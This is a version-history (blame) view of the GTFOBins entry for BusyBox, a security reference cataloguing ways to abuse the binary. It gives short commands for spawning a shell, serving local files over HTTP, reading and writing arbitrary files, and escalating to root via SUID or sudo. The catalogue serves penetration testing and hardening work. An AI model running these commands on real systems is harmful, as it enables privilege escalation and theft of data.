1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00
GTFOBins.github.io/_gtfobins/busybox.md

26 lines
768 B
Markdown
Raw Normal View History

2018-05-31 21:09:44 +02:00
---
2018-07-16 15:01:50 +02:00
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
2018-06-01 12:40:05 +02:00
what GTFBins binaries are supported. Here some example.
2018-05-31 21:09:44 +02:00
functions:
execute-interactive:
2018-07-16 15:01:50 +02:00
- code: busybox sh
2018-05-31 21:09:44 +02:00
upload:
2018-07-16 15:01:50 +02:00
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=12345
busybox httpd -f -p $LPORT -h .
2018-07-04 20:26:52 +02:00
file-write:
2018-07-16 15:01:50 +02:00
- code: |
LFILE=file_to_write
busybox sh -c 'echo "data" > $LFILE'
2018-07-04 20:26:52 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- code: |
LFILE=file_to_read
./busybox cat "$LFILE"
2018-07-04 20:26:52 +02:00
suid-enabled:
2018-07-16 15:01:50 +02:00
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
code: "./busybox sh"
2018-07-04 20:26:52 +02:00
sudo-enabled:
2018-07-16 15:01:50 +02:00
- code: sudo busybox sh
2018-05-31 21:09:44 +02:00
---